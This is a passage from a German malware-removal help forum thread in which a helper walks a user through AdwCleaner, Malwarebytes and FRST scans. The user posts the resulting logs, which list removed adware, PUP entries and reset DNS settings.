21:27:16.0567 0x0ce4  OneDriveSetup - ok
21:27:16.0604 0x0ce4  [ 39F07FEA9532CD88F388ECABEFE37CD2, 59A73628DE72CAFA0B8A3E22054EEEF85820AD012BC68E279A4B5E0B728E9621 ] C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe
21:27:16.0628 0x0ce4  Spotify Web Helper - ok
21:27:16.0651 0x0ce4  [ 00F30FDFDE3E276C1A731C2DF951D67E, 018E6933882FCC41EE96E198E6F7ECEFB53EC650B1044A58876B26EDE011158B ] C:\Users\Dino\AppData\Local\Microsoft\OneDrive\OneDrive.exe
21:27:16.0677 0x0ce4  OneDrive - ok
21:27:16.0694 0x0ce4  [ 39D212A2684CC960AA166629CC2A5B89, 816D9B1405BD5BB073EFDA8F3B6F1A5DCAE739AB3FEB9267FDD4A113A5E8F1B7 ] C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe
21:27:16.0712 0x0ce4  SmartSwitchPDLR.exe - ok
21:27:16.0714 0x0ce4  Waiting for KSN requests completion. In queue: 280
21:27:17.0731 0x0ce4  AV detected via SS2: Windows Defender, C:\Program Files\Windows Defender\MSASCui.exe ( 4.11.15063.0 ), 0x60100 ( disabled : updated )
21:27:17.0732 0x0ce4  AV detected via SS2: Bitdefender Virenschutz, C:\Program Files\Bitdefender\Bitdefender 2017\wscfix.exe ( 21.0.25.76 ), 0x41000 ( enabled : updated )
21:27:17.0733 0x0ce4  FW detected via SS2: Bitdefender Firewall, C:\Program Files\Bitdefender\Bitdefender 2017\wscfix.exe ( 21.0.25.76 ), 0x41010 ( enabled )
21:27:17.0987 0x0ce4  ============================================================
21:27:17.0987 0x0ce4  Scan finished
21:27:17.0987 0x0ce4  ============================================================
21:27:17.0991 0x29a0  Detected object count: 1
21:27:17.0991 0x29a0  Actual detected object count: 1
21:27:25.0283 0x29a0  GamingMouse ( UnsignedFile.Multi.Generic ) - skipped by user
21:27:25.0283 0x29a0  GamingMouse ( UnsignedFile.Multi.Generic ) - User select action: Skip
         

Ich denke jetzt habe ich alles.

Alt 22.05.2017, 15:55   #11
M-K-D-B
/// TB-Ausbilder
 
Trojaner, Adware oder sonstiges ? - Standard

Trojaner, Adware oder sonstiges ?



Servus,





Schritt 1
Downloade Dir bitte AdwCleaner auf deinen Desktop.
  • Schließe alle offenen Programme und Browser.
  • Starte die adwcleaner.exe mit einem Doppelklick.
  • Stimme den Nutzungsbedingungen zu.
  • Klicke auf Werkzeuge > Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
    • Image File Execution Options Schlüssel
    • "Tracing" Schlüssel
    • "Prefetch" Dateien
    • Proxy
    • Winsock
    • Firewall
    • Internet Explorer Richtlinien
    • Chrome Richtlinien
  • Bestätige die Auswahl mit Ok.
  • Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
  • Klicke nun auf Löschen (auch dann wenn AdwCleaner sagt, dass nichts gefunden wurde) und bestätige auftretende Hinweise mit Ok.
  • Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
  • Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).





Schritt 2
Downloade Dir bitte Malwarebytes Anti-Malware 3
  • Installiere das Programm in den vorgegebenen Pfad.
  • Starte Malwarebytes' Anti-Malware (MBAM).
  • Klicke im Anschluss auf Scan, wähle den Bedrohungs-Scan aus und klicke auf Scan starten.
  • Lass am Ende des Suchlaufs alle Funde (falls vorhanden) in die Quarantäne verschieben. Klicke dazu auf Ausgewählte Elemente in die Quarantäne verschieben.
  • Lass deinen Rechner ggf. neu starten, um die Bereinigung abzuschließen.
  • Starte MBAM nach dem Neustart, klicke auf Berichte.
  • Wähle den neuesten Scan-Bericht aus, klicke auf Bericht anzeigen und dann auf Export.
  • Wähle Textdatei (.txt) aus und speichere die Datei als mbam.txt auf dem Desktop ab.
  • Füge den Inhalt der mbam.txt mit deiner nächsten Antwort hinzu.





Schritt 3
  • Starte die FRST erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist und drücke auf Untersuchen.
  • FRST erstellt nun zwei Logdateien (FRST.txt und Addition.txt).
  • Poste mir beide Logdateien mit deiner nächsten Antwort.






Bitte poste mit deiner nächsten Antwort
  • die Logdatei von AdwCleaner,
  • die Logdatei von MBAM,
  • die beiden neuen Logdateien von FRST.
__________________
Gruß
M-K-D-B


==========================================================
offline vom 22.12.2018 bis 01.01.2019
==========================================================

Das Trojaner-Board unterstützen

Alt 22.05.2017, 18:38   #12
dinoexe
 
Trojaner, Adware oder sonstiges ? - Standard

Trojaner, Adware oder sonstiges ?



Hi Matthias,

AdwCleaner soll mittlerweile ein neues Update (6.047) haben. Habe aber die Version von Filepony genommen wie du es beschrieben hast. Anbei der Log.

Code:
ATTFilter
# AdwCleaner v6.046 - Bericht erstellt am 22/05/2017 um 18:19:38
# Aktualisiert am 24/04/2017 von Malwarebytes
# Datenbank : 2017-05-19.1 [Server]
# Betriebssystem : Windows 10 Pro  (X64)
# Benutzername : Dino - ****
# Gestartet von : C:\Users\Dino\Desktop\AdwCleaner_6.046.exe
# Modus: Löschen
# Unterstützung : https://www.malwarebytes.com/support



***** [ Dienste ] *****



***** [ Ordner ] *****

[-] Ordner gelöscht: C:\ProgramData\4f229b49-57c7-0
[-] Ordner gelöscht: C:\ProgramData\4f229b49-5e15-0
[-] Ordner gelöscht: C:\ProgramData\646f2bbc
[-] Ordner gelöscht: C:\ProgramData\b540151d-6521-1
[-] Ordner gelöscht: C:\ProgramData\b540151d-6b21-0
[-] Ordner gelöscht: C:\ProgramData\{094151c3-112c-0}
[-] Ordner gelöscht: C:\ProgramData\{1ed33b8d-712c-0}
[-] Ordner gelöscht: C:\ProgramData\{2b0a4a26-612c-1}
[-] Ordner gelöscht: C:\Users\Dino\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk
[-] Ordner gelöscht: C:\Users\Dino\AppData\Roaming\Note-up
[-] Ordner gelöscht: C:\Users\Dino\AppData\Roaming\gplyra
[-] Ordner gelöscht: C:\Users\Dino\AppData\Roaming\Kuaizip
[-] Ordner gelöscht: C:\Users\Dino\AppData\Roaming\Softlink
[-] Ordner gelöscht: C:\Users\Dino\AppData\Roaming\Microleaves
[#] Ordner mit Neustart gelöscht: C:\Users\Dino\AppData\Roaming\Note-UP
[-] Ordner gelöscht: C:\Program Files\Common Files\Noobzo
[-] Ordner gelöscht: C:\ProgramData\DownloadManager
[-] Ordner gelöscht: C:\ProgramData\SearchModule
[-] Ordner gelöscht: C:\Program Files (x86)\DPower
[-] Ordner gelöscht: C:\Program Files (x86)\BestCleaner
[-] Ordner gelöscht: C:\Users\Dino\AppData\Local\app
[#] Ordner mit Neustart gelöscht: C:\Program Files (x86)\DPower
[-] Ordner gelöscht: C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\naweriweentcofise
[-] Ordner gelöscht: C:\WINDOWS\SysWOW64\sstmp


***** [ Dateien ] *****

[-] Datei gelöscht: C:\WINDOWS\SysNative\drivers\NetUtils2016.sys


***** [ DLL ] *****



***** [ WMI ] *****



***** [ Verknüpfungen ] *****



***** [ Aufgabenplanung ] *****

[-] Aufgabe gelöscht: {0E0E0947-0F0F-7D0F-7D11-0E0F78051104}


***** [ Registrierungsdatenbank ] *****

[-] Schlüssel gelöscht: HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Software\Spark
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\Spark
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Spark
[-] Daten  wiederhergestellt: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a} [NameServer] 
[-] Daten  wiederhergestellt: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034} [NameServer] 
[-] Daten  wiederhergestellt: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef} [NameServer] 
[-] Daten  wiederhergestellt: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0} [NameServer] 
[-] Daten  wiederhergestellt: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a} [NameServer] 
[-] Daten  wiederhergestellt: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034} [NameServer] 
[-] Daten  wiederhergestellt: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef} [NameServer] 
[-] Daten  wiederhergestellt: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0} [NameServer] 
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\cmptch.com
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\static.cmptch.com
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\cmptch.com
[-] Schlüssel gelöscht: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\static.cmptch.com
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\cmptch.com
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\static.cmptch.com
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\cmptch.com
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\static.cmptch.com
[-] Schlüssel gelöscht: HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E


***** [ Browser ] *****

[-] [C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData] [startup_urls] Gelöscht: hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp
[-] [C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData] [homepage] Gelöscht: hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp


*************************

:: "Tracing" Schlüssel gelöscht
:: Winsock Einstellungen zurückgesetzt
:: "Image File Execution Options" Schlüssel gelöscht
:: "Prefetch" Dateien gelöscht
:: Proxy Einstellungen zurückgesetzt
:: Firewall Einstellungen zurückgesetzt
:: Internet Explorer Richtlinien gelöscht
:: Chrome Richtlinien gelöscht

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [6588 Bytes] - [22/05/2017 18:19:38]
C:\AdwCleaner\AdwCleaner[S0].txt - [6473 Bytes] - [22/05/2017 18:18:35]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [6734 Bytes] ##########
         
Anbei der Malwarebytes Log

Code:
ATTFilter
Malwarebytes
www.malwarebytes.com

-Protokolldetails-
Scan-Datum: 22.05.17
Scan-Zeit: 18:25
Protokolldatei: Mbam.txt
Administrator: Ja

-Softwaredaten-
Version: 3.1.2.1733
Komponentenversion: 1.0.122
Version des Aktualisierungspakets: 1.0.1995
Lizenz: Testversion

-Systemdaten-
Betriebssystem: Windows 10
CPU: x64
Dateisystem: NTFS
Benutzer: ****\Dino

-Scan-Übersicht-
Scan-Typ: Bedrohungs-Scan
Ergebnis: Abgeschlossen
Gescannte Objekte: 377606
Erkannte Bedrohungen: 30
In die Quarantäne verschobene Bedrohungen: 30
Abgelaufene Zeit: 1 Min., 8 Sek.

-Scan-Optionen-
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Aktiviert
PUM: Aktiviert

-Scan-Details-
Prozess: 0
(keine bösartigen Elemente erkannt)

Modul: 0
(keine bösartigen Elemente erkannt)

Registrierungsschlüssel: 1
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{646f2bbc}, In Quarantäne, [28], [260250],1.0.1995

Registrierungswert: 1
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{646f2bbc}|1, In Quarantäne, [28], [260250],1.0.1995

Registrierungsdaten: 14
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS|DhcpNameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}|DhcpNameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}|DhcpNameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{46b778ab-edfa-42f3-91a9-8cdd864f74fe}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{7340d9b1-829b-408c-bec7-3deae2933b18}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{8718928d-cbeb-45ea-a621-800a9249001d}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}|DhcpNameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{b99ccfae-f682-4e7e-b110-ad59dc2334c2}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}|NameServer, Ersetzt, [28], [-1],0.0.0
PUP.Optional.DNSUnlocker.ACMB2, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}|DhcpNameServer, Ersetzt, [28], [-1],0.0.0

Daten-Stream: 0
(keine bösartigen Elemente erkannt)

Ordner: 5
Adware.Elex.SHHKRST, C:\USERS\DINO\APPDATA\ROAMING\Thertsparimoly, In Quarantäne, [11], [373192],1.0.1995
PUP.Optional.SwytShop, C:\USERS\DINO\APPDATA\LOCAL\Programs\SS_FF, In Quarantäne, [3121], [375392],1.0.1995
PUP.Optional.SwytShop, C:\USERS\DINO\APPDATA\LOCAL\Programs\SwytShop_Pkg1, In Quarantäne, [3121], [386986],1.0.1995
Adware.OtherSearch.TSKRST, C:\Program Files (x86)\X7YP5EPJng\SSL, In Quarantäne, [2795], [371199],1.0.1995
Adware.OtherSearch.TSKRST, C:\PROGRAM FILES (X86)\X7YP5EPJng, In Quarantäne, [2795], [371199],1.0.1995

Datei: 9
PUP.Optional.SwytShop, C:\Users\Dino\AppData\Local\Programs\SS_FF\SS_FF.xpi, In Quarantäne, [3121], [375392],1.0.1995
PUP.Optional.SwytShop, C:\Users\Dino\AppData\Local\Programs\SwytShop_Pkg1\unins000.dat, In Quarantäne, [3121], [386986],1.0.1995
PUP.Optional.Youndoo, C:\USERS\DINO\APPDATA\ROAMING\PROFILES\PRISERPYGRESENT.DEFAULT\SEARCHPLUGINS\ME1J2IQC.XML, In Quarantäne, [599], [324489],1.0.1995
Adware.OtherSearch.TSKRST, C:\PROGRAM FILES (X86)\X7YP5EPJng\SSL\OtherSearch Inc CA 2.cer, In Quarantäne, [2795], [371199],1.0.1995
Adware.OtherSearch.TSKRST, C:\Program Files (x86)\X7YP5EPJng\SSL\cert.db, In Quarantäne, [2795], [371199],1.0.1995
Adware.OtherSearch.TSKRST, C:\Program Files (x86)\X7YP5EPJng\SSL\xtls.db, In Quarantäne, [2795], [371199],1.0.1995
Adware.OtherSearch.TSKRST, C:\Program Files (x86)\X7YP5EPJng\SSL\xv.db, In Quarantäne, [2795], [371199],1.0.1995
Adware.OtherSearch.TSKRST, C:\Program Files (x86)\X7YP5EPJng\dlog.txt, In Quarantäne, [2795], [371199],1.0.1995
Adware.OtherSearch.TSKRST, C:\Program Files (x86)\X7YP5EPJng\s.xml, In Quarantäne, [2795], [371199],1.0.1995

Physischer Sektor: 0
(keine bösartigen Elemente erkannt)


(end)
         
Und hier FRST aktuell

Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 20-05-2017
durchgeführt von Dino (Administrator) auf *** (22-05-2017 18:36:22)
Gestartet von C:\Users\Dino\Desktop
Geladene Profile: Dino &  (Verfügbare Profile: Dino)
Platform: Windows 10 Pro Version 1703 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
() C:\Windows\SysWOW64\ASGT.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe
() C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
(ASUS) C:\Program Files (x86)\ASUS\GPU Tweak\Monitor.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Spotify Ltd) C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Samsung) C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe
() C:\Program Files (x86)\ASUS\AI Suite III\AsusMiniBar.exe
(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
(Samsung Electronics.) C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe
(Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe
() C:\Program Files (x86)\Drakonia Configurator\hid.exe
() C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.15063.0_none_1a733a82001933cc\TiWorker.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8466136 2015-04-30] (Realtek Semiconductor)
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [3146704 2017-05-09] (Malwarebytes)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [438888 2014-01-15] (CANON INC.)
HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [210432 2016-07-05] (Geek Software GmbH)
HKLM-x32\...\Run: [GamingMouse] => C:\Program Files (x86)\Drakonia Configurator\hid.exe [248832 2013-10-29] ()
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [Spotify Web Helper] => C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-02-19] (Spotify Ltd)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [SmartSwitchPDLR.exe] => C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe [1037992 2017-02-07] (Samsung)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\MountPoints2: {ab244902-eb0d-11e4-8257-806e6f6e6963} - "E:\autorun.exe" 
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\...\Run: [Spotify Web Helper] => C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-02-19] (Spotify Ltd)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\...\Run: [SmartSwitchPDLR.exe] => C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe [1037992 2017-02-07] (Samsung)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\...\MountPoints2: {ab244902-eb0d-11e4-8257-806e6f6e6963} - "E:\autorun.exe" 

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\Parameters: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{0784e829-3340-11e7-867e-806e6f6e6963}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{46b778ab-edfa-42f3-91a9-8cdd864f74fe}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{7340d9b1-829b-408c-bec7-3deae2933b18}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{8718928d-cbeb-45ea-a621-800a9249001d}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{b99ccfae-f682-4e7e-b110-ad59dc2334c2}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.de/
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.de/
BHO: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
